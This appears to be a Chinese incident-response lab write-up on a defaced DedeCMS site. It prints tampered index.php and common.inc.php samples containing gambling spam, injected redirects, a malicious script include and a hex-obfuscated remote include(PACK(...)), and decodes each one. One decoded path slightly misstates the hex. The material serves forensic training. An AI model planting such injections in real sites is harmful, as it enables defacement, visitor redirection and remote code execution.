第四章 windows实战--黑页&&篡改 - 第四章 - 应急响应 - 玄机 - 靶场练习

# 题目 1

	<html>

	<title>Search Results for 香港六合彩广告【复制输入∶888888.com】1分六合彩开奖结果中奖计划98%】手机买大乐透摇一摇【复制进入∶888888.com】官方法国快3开奖结果中奖计划98%】r7a3l1b6f</title>
	<body>

	<h1>Search Results for 香港六合彩广告【复制输入∶888888.com】1分六合彩开奖结果中奖计划98%】手机买大乐透摇一摇【复制进入∶888888.com】官方法国快3开奖结果中奖计划98%】r7a3l1b6f</h1>

	<?php

	if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
	{
	header('Location:install/index.php');
	exit();
	}

	if(isset($_GET['upcache']) \|\| !file_exists('index.html'))
	{
	require_once (dirname(__FILE__) . "/include/common.inc.php");
	require_once DEDEINC."/arc.partview.class.php";
	$GLOBALS['_arclistEnv'] = 'index';
	$row = $dsql->GetOne("Select * From `#@__homepageset`");
	$row['templet'] = MfTemplet($row['templet']);
	$pv = new PartView();
	$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
	$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
	if ($row['showmod'] == 1)
	{
	$pv->SaveToHtml(dirname(__FILE__).'/index.html');
	include(dirname(__FILE__).'/index.html');
	exit();
	} else {
	$pv->Display();
	exit();
	}
	}
	else
	{
	header('HTTP/1.1 301 Moved Permanently');
	header('Location:index.html');
	}
	?>

	</body>
	</html>

这个只是在头部插入了黑产的东西

	<?php

	if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
	{
	header('Location:install/index.php');
	exit();
	}

	if(isset($_GET['upcache']) \|\| !file_exists('index.html'))
	{
	require_once (dirname(__FILE__) . "/include/common2.inc.php");
	require_once DEDEINC."/arc.partview.class.php";
	$GLOBALS['_arclistEnv'] = 'index';
	$row = $dsql->GetOne("Select * From `#@__homepageset`");
	$row['templet'] = MfTemplet($row['templet']);
	$pv = new PartView();
	$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
	$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
	if ($row['showmod'] == 1)
	{
	$pv->SaveToHtml(dirname(__FILE__).'/index.html');
	include(dirname(__FILE__).'/index.html');
	exit();
	} else {
	$pv->Display();
	exit();
	}
	}
	else
	{
	header('HTTP/1.1 301 Moved Permanently');
	header('Location:index.html');
	}
	?>

可以看到里面没有直接的跳转，应该是包含文件里 /include/common2.inc.php

找到了跳转代码

	<?php
	/**
	* @version $Id: common.inc.php 3 17:44 2010-11-23 $
	* @package DedeCMS.Libraries
	* @founder IT 柏拉图，https://weibo.com/itprato
	* @author DedeCMS 团队
	* @copyright Copyright (c) 2007 - 2021, 上海卓卓网络科技有限公司 (DesDev, Inc.)
	* @license http://help.dedecms.com/usersguide/license.html
	* @link http://www.dedecms.com
	*/

	Header("Location:./heiye/index2.html");

	// 生产环境使用 production
	define('DEDE_ENVIRONMENT', 'production');

	<html>

	<script src="http://127.0.0.1/dedecms/include/1.js"></script>

	<?php

	if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
	{
	header('Location:install/index.php');
	exit();
	}

	if(isset($_GET['upcache']) \|\| !file_exists('index.html'))
	{
	require_once (dirname(__FILE__) . "/include/common.inc.php");
	require_once DEDEINC."/arc.partview.class.php";
	$GLOBALS['_arclistEnv'] = 'index';
	$row = $dsql->GetOne("Select * From `#@__homepageset`");
	$row['templet'] = MfTemplet($row['templet']);
	$pv = new PartView();
	$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
	$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
	if ($row['showmod'] == 1)
	{
	$pv->SaveToHtml(dirname(__FILE__).'/index.html');
	include(dirname(__FILE__).'/index.html');
	exit();
	} else {
	$pv->Display();
	exit();
	}
	}
	else
	{
	header('HTTP/1.1 301 Moved Permanently');
	header('Location:index.html');
	}
	?>

	</html>

头部的编码解析之后是： http://127.0.0.1/dedecms/include/1.js

window.location='http://127.0.0.1/dedecms/heiye/index3.html';

	<?php

	if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
	{
	header('Location:install/index.php');
	exit();
	}

	if(isset($_GET['upcache']) \|\| !file_exists('index.html'))
	{
	require_once (dirname(__FILE__) . "/include/common3.inc.php");
	require_once DEDEINC."/arc.partview.class.php";
	$GLOBALS['_arclistEnv'] = 'index';
	$row = $dsql->GetOne("Select * From `#@__homepageset`");
	$row['templet'] = MfTemplet($row['templet']);
	$pv = new PartView();
	$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
	$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
	if ($row['showmod'] == 1)
	{
	$pv->SaveToHtml(dirname(__FILE__).'/index.html');
	include(dirname(__FILE__).'/index.html');
	exit();
	} else {
	$pv->Display();
	exit();
	}
	}
	else
	{
	header('HTTP/1.1 301 Moved Permanently');
	header('Location:index.html');
	}
	?>

这个是 /include/common3.inc.php 文件加了跳转，但是这个文件不存在。很困惑啊

可能是其他的文件调整了变量？只需要删除这个 3 就能恢复正常

	<?php
	if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
	{
	header('Location:install/index.php');
	exit();
	}
	include(PACK('H*','687474703A2F2F3132372E302E302E312F64656465636D732F696E636C7564652F75706C6F6164732F696D6167652F3838383838382F31'));
	if(isset($_GET['upcache']) \|\| !file_exists('index.html'))
	{
	require_once (dirname(__FILE__) . "/include/common.inc.php");
	require_once DEDEINC."/arc.partview.class.php";
	$GLOBALS['_arclistEnv'] = 'index';
	$row = $dsql->GetOne("Select * From `#@__homepageset`");
	$row['templet'] = MfTemplet($row['templet']);
	$pv = new PartView();
	$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
	$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
	if ($row['showmod'] == 1)
	{
	$pv->SaveToHtml(dirname(__FILE__).'/index.html');
	include(dirname(__FILE__).'/index.html');
	exit();
	} else {
	$pv->Display();
	exit();
	}
	}
	else
	{
	header('HTTP/1.1 301 Moved Permanently');
	header('Location:index.html');
	}
	?>

使用了 PACK 函数对十六进制字符串进行解码

解码后： http://127.0.0.1/dedecms/include/uploads/image/88888888/1

然后跳转了